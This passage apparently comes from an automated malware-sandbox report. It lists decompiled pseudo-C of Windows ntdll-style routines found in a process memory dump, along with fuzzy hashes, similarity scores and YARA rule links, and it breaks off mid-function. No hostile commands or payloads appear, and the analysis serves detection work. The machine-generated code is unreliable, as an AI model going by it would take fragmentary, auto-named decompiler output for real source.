Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4d7d39bcc9a3352a013aa98b0d94278e268381ed0dbadbd12f6629891b1fb0d
Instruction ID: eb6a8e8bb6707789cbed7475b1eabd57316e44bcaaa71d0fc45aec170505c10c
Opcode Fuzzy Hash: a4d7d39bcc9a3352a013aa98b0d94278e268381ed0dbadbd12f6629891b1fb0d
Instruction Fuzzy Hash: E0219572A40104AFCB01DF98CD85B6AB7BEFF44748F1504A8E6049B251DB71ED55DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B06CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E02B06CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E02AA7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E02AA7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x2a65c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E02ABF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E02ABF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E02B07016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L02AA2400( &_v52);
								}
								_t21 = L02AA2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x02b06cfb
0x02b06d00
0x02b06d02
0x02b06d06
0x02b06d0a
0x02b06d0e
0x02b06d19
0x02b06d2b
0x02b06d1b
0x02b06d24
0x02b06d24
0x02b06d33
0x02b06d39
0x02b06d46
0x02b06d4f
0x02b06d61
0x02b06d51
0x02b06d5a
0x02b06d5a
0x02b06d69
0x02b06d6b
0x02b06d6d
0x02b06d6f
0x02b06d6f
0x02b06d74
0x02b06d79
0x02b06d7a
0x02b06d7f
0x02b06d82
0x02b06d88
0x02b06d89
0x02b06d90
0x02b06d94
0x02b06da7
0x02b06db1
0x02b06db1
0x02b06dbb
0x02b06dbb
0x02b06d90
0x02b06d69
0x02b06d46
0x02b06dc6

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bbbd07b81f159a1070f3c7bba336994cea3406678aa23e5887198d5de3c862a
Instruction ID: 3582655c191495e3c4216c9a03f100860f5ff61c3b4a5a8b787f8831d024dd52
Opcode Fuzzy Hash: 3bbbd07b81f159a1070f3c7bba336994cea3406678aa23e5887198d5de3c862a
Instruction Fuzzy Hash: 8821C5725043459FC712DF2AC984BABBBEDEF91754F040696FD40C7291EB34D518CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B5070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02B5070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E02B507DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E02B4AFDE( &_v8,  &_v12);
					E02B51293(_t38, _v28, _t60);
					if(E02AA7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E02B414FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x02b5071b
0x02b50724
0x02b50734
0x02b50738
0x02b5074b
0x02b5074b
0x02b50753
0x02b50753
0x02b50759
0x02b5075d
0x02b50774
0x02b50779
0x02b5077d
0x02b50789
0x02b50795
0x02b507a7
0x02b50797
0x02b507a0
0x02b507a0
0x02b507af
0x02b507c4
0x02b507cd
0x02b507cd
0x02b507af
0x02b507dc

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: a72b2dd8d47804b181250b87ca8f99be3927755c42f37703dccabd8082804cf0
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: C02104362042149FD705EF18C890B6ABBA6EFC4750F048AA9FD958F381DB30D909CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02AAAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E02AAAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E02AA7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E02AA7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E02AA7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E02AA7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E02B07794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x02aaae78
0x02aaae7c
0x02aaae7e
0x02aaae81
0x02aaae86
0x02aaae8d
0x02af2691
0x02aaae93
0x02aaae93
0x02aaae93
0x02aaae98
0x02aaae9d
0x02af26a2
0x02af26b4
0x02af26a4
0x02af26ad
0x02af26ad
0x02af26b9
0x00000000
0x02af26bb
0x00000000
0x02af26bb
0x02aaaea3
0x02aaaea3
0x02aaaea3
0x02aaaeaa
0x02af26c0
0x02af26c9
0x02af26c9
0x02aaaeb3
0x02af26d4
0x02af26e1
0x00000000
0x00000000
0x02af26e7
0x02af26ee
0x02af26f0
0x02af26f9
0x02af26f9
0x02af2702
0x02af2708
0x02af2708
0x02af270b
0x02af270f
0x02af2711
0x02af2711
0x02af2725
0x02af2725
0x00000000
0x02aaaeb9
0x02aaaeb9
0x02aaaebf
0x02aaaebf
0x02aaaeb3

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: aecc2ed66b533989ec08f2ea09ec40d8f4240ab79c746bd2556e3c970f64a727
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: F121F632601680DFD766DBA9C994B26B7F9EF44344F0900A0EE448B792EF39DC40CE90

Uniqueness

Uniqueness Score: -1.00%

Function 02B07794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E02B07794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x2b77b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E02ACF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E02AA7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E02AC9AE0();
					_t24 = L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x02b07799
0x02b0779a
0x02b0779b
0x02b077a3
0x02b077ab
0x02b077ae
0x02b077b1
0x02b077b1
0x02b077bf
0x02b077c4
0x02b077c8
0x02b077ce
0x02b077d4
0x02b077e0
0x02b077e0
0x02b077d6
0x02b077d6
0x02b077de
0x00000000
0x00000000
0x02b077de
0x02b077e5
0x02b077f0
0x02b077f3
0x02b077f6
0x02b077fd
0x02b07800
0x02b0780c
0x02b07818
0x02b0782b
0x02b0781a
0x02b07823
0x02b07823
0x02b07830
0x02b07831
0x02b07838
0x02b0783d
0x02b0783e
0x02b0784f
0x02b0784f
0x02b0785a

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d05bff190d72c61c8933fbe1f5029359de1c875755923d55f9a19abe066c7d3f
Instruction ID: e6992b93f8ce6c76001f3150579b1fe76dcd313489ec6127f1fb8088e03e0eac
Opcode Fuzzy Hash: d05bff190d72c61c8933fbe1f5029359de1c875755923d55f9a19abe066c7d3f
Instruction Fuzzy Hash: DF219D72940604ABC725DF69DD90E6BFBA9EF48340F1005ADF50AC7790EB34E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02ABFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02ABFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E02A976E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x02abfd9b
0x02abfda0
0x02abfda1
0x02abfdab
0x02abfdad
0x02abfdb0
0x02abfdb8
0x02abfe0f
0x02abfde6
0x02abfde9
0x02abfdec
0x02afc0c0
0x02abfdfe
0x02abfe06
0x02abfe06
0x02afc0c8
0x02abfe2d
0x02abfe2d
0x00000000
0x02abfe2d
0x02afc0d1
0x02afc0e0
0x02afc0e5
0x02afc0e5
0x02afc0e8
0x00000000
0x02afc0e8
0x02abfdf4
0x00000000
0x00000000
0x02abfdf6
0x02abfdfa
0x02abfe1a
0x02abfe1f
0x02abfe1f
0x02abfdfc
0x00000000
0x02abfdfc
0x02abfdcc
0x02abfdd0
0x02abfe26
0x00000000
0x02abfe26
0x02abfdd8
0x02abfddb
0x02abfddd
0x02abfde0
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 28fdd332c7fd1f47c539e9c836e40f63b12b548b91a5cbf79b72ddf41ec74b1e
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: BD214A75640644DFC736CF4ACA80AA6F7A9EF94A14F28816EE94987A12DB349C00CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A89240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E02A89240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x2b5f708);
				E02ADD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E02AC95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E02AC95D0();
				_t33 =  *0x2b784c4; // 0x0
				L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x2b784c4; // 0x0
				L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x2b784c4; // 0x0
				E02AA2280(L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2b786b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E02AC95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E02AC95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E02A89325();
					_t50 =  *0x2b784c4; // 0x0
					return E02ADD0D1(L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x02a89240
0x02a89242
0x02a89247
0x02a8924c
0x02a8924e
0x02a89255
0x02a89257
0x02a8925a
0x02a8925f
0x02a8925f
0x02a89266
0x02a89271
0x02a89276
0x02a89279
0x02a8927e
0x02a89295
0x02a8929a
0x02a892b1
0x02a892b6
0x02a892d7
0x02a892dc
0x02a892e0
0x02a892e6
0x02a892e8
0x02a892ee
0x02a89332
0x02a89333
0x02a89337
0x02a89338
0x02a8933a
0x02a8933a
0x02a8933d
0x02a89342
0x02a89342
0x02a89345
0x02a89349
0x02a8934e
0x02a89352
0x02a89357
0x02a892f4
0x02a892f4
0x02a892f6
0x02a892f9
0x02a89300
0x02a89306
0x02a89324
0x02a89324

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3286cb4548ac1b2d6d10baa065ee4c882c72a6fa136d0024a6947c56960b2be2
Instruction ID: d00adf7eced17d286d8b184fbf955fd5e857a1f33d281a4f0c92089d9cc02cca
Opcode Fuzzy Hash: 3286cb4548ac1b2d6d10baa065ee4c882c72a6fa136d0024a6947c56960b2be2
Instruction Fuzzy Hash: C7212532481A01DFC722EF68CB50F6AB7BAFF08704F1445ACA04A97AA1CB34E955DF44

Uniqueness

Uniqueness Score: -1.00%

Function 02ABB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02ABB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E02AA2280(_t12, 0x2b78608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E02AC00C2(0x2b78608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x02abb395
0x02abb3a2
0x02abb3a5
0x02abb3aa
0x02abb3b2
0x02abb3ba
0x02abb3bd
0x02abb3c0
0x02abb3c4
0x02abb3c9
0x02afa3e9
0x02afa3ed
0x02afa3f0
0x02afa3ff
0x02afa403
0x02afa409
0x00000000
0x00000000
0x02afa40b
0x02afa40b
0x02afa40f
0x02afa415
0x02afa423
0x02afa423
0x02afa415
0x02abb3d1
0x02abb3e8
0x02abb3e8
0x02abb3d9

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b73a33daf1238cc6da4478ffde2b629697ce6720cda92fb572e40d69eb13c832
Instruction ID: e5c43cda44931a6482ee785788aa4f3d75fbd2c7866ed591ae66d0dd2749c4fd
Opcode Fuzzy Hash: b73a33daf1238cc6da4478ffde2b629697ce6720cda92fb572e40d69eb13c832
Instruction Fuzzy Hash: D0116B373052109BCB198B548EC1AABB26BEFC5730B2941ADEE16C7781CE359C02C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 02B14257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E02B14257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x2b608d0);
				E02ADD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E02B141E8(__ebx, __edi, __ecx, _t39);
				E02A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x2b787e4;
					_t18 =  *0x2b787e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x2b75cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x2b787e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x2b787e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L02A87055(_t31 + 0xfffffff8);
								_t24 =  *0x2b787e0; // 0x0
								_t18 = _t24 - 1;
								 *0x2b787e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x2b75cd0;
				if( *0x2b75cd0 <= 0) {
					L02A87055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x2b787e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x2b787e8 = _t30;
						 *0x2b787e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E02ADD0D1(L02B14320());
			}

0x02b14257
0x02b14257
0x02b14257
0x02b14259
0x02b1425e
0x02b14263
0x02b14265
0x02b14273
0x02b14278
0x02b1427c
0x02b1427f
0x02b14281
0x02b14287
0x02b142d7
0x02b142d7
0x02b142da
0x02b1428d
0x02b1428d
0x02b1428f
0x02b14292
0x02b14297
0x02b1429c
0x02b142a0
0x02b142a6
0x02b142a8
0x02b142ae
0x02b142b3
0x00000000
0x02b142ba
0x02b142ba
0x02b142bf
0x02b142c5
0x02b142ca
0x02b142cf
0x02b142d0
0x00000000
0x02b142d0
0x02b142b3
0x00000000
0x02b142a6
0x02b1429c
0x02b142dc
0x02b142dc
0x02b142e3
0x02b14309
0x02b142e5
0x02b142e5
0x02b142e8
0x02b142ee
0x02b142f0
0x00000000
0x02b142f2
0x02b142f2
0x02b142f4
0x02b142f7
0x02b142f9
0x02b14300
0x02b14300
0x02b142f0
0x02b1430e
0x02b1431f

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd85561ae905db93289d69502a6e52a7e1015fad8acfe0916a76e8e56be39dc7
Instruction ID: 11a0ff83417459bd864e6e2528f2165f7c9701be52129bdf407406bbdc6176f0
Opcode Fuzzy Hash: fd85561ae905db93289d69502a6e52a7e1015fad8acfe0916a76e8e56be39dc7
Instruction Fuzzy Hash: 18219D70991700CFC729EF24E104A14BBF2FB85395BA08AEEC156DB290DB31D499DF81

Uniqueness

Uniqueness Score: -1.00%

Function 02B046A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02B046A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E02ACF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E02ABD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L02AA77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x02b046b7
0x02b046ba
0x02b046c5
0x02b046c8
0x02b046d0
0x02b046d4
0x02b046e6
0x02b046e9
0x02b046f4
0x02b046ff
0x02b04705
0x02b04706
0x02b0470c
0x02b04713
0x02b0471b
0x02b04723
0x02b04725
0x02b046d6
0x02b046d9
0x02b046db
0x02b046db
0x02b04732

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 1ee0dc2c3b81e2622c95e0d1cb8d36118bbb98b135e338e3a7ec47b0e5b96638
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 33110272904208BBC7069F5C99808BEFBBAEF95300F1080AAF944C7350DA319D51C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 02AC37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E02AC37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
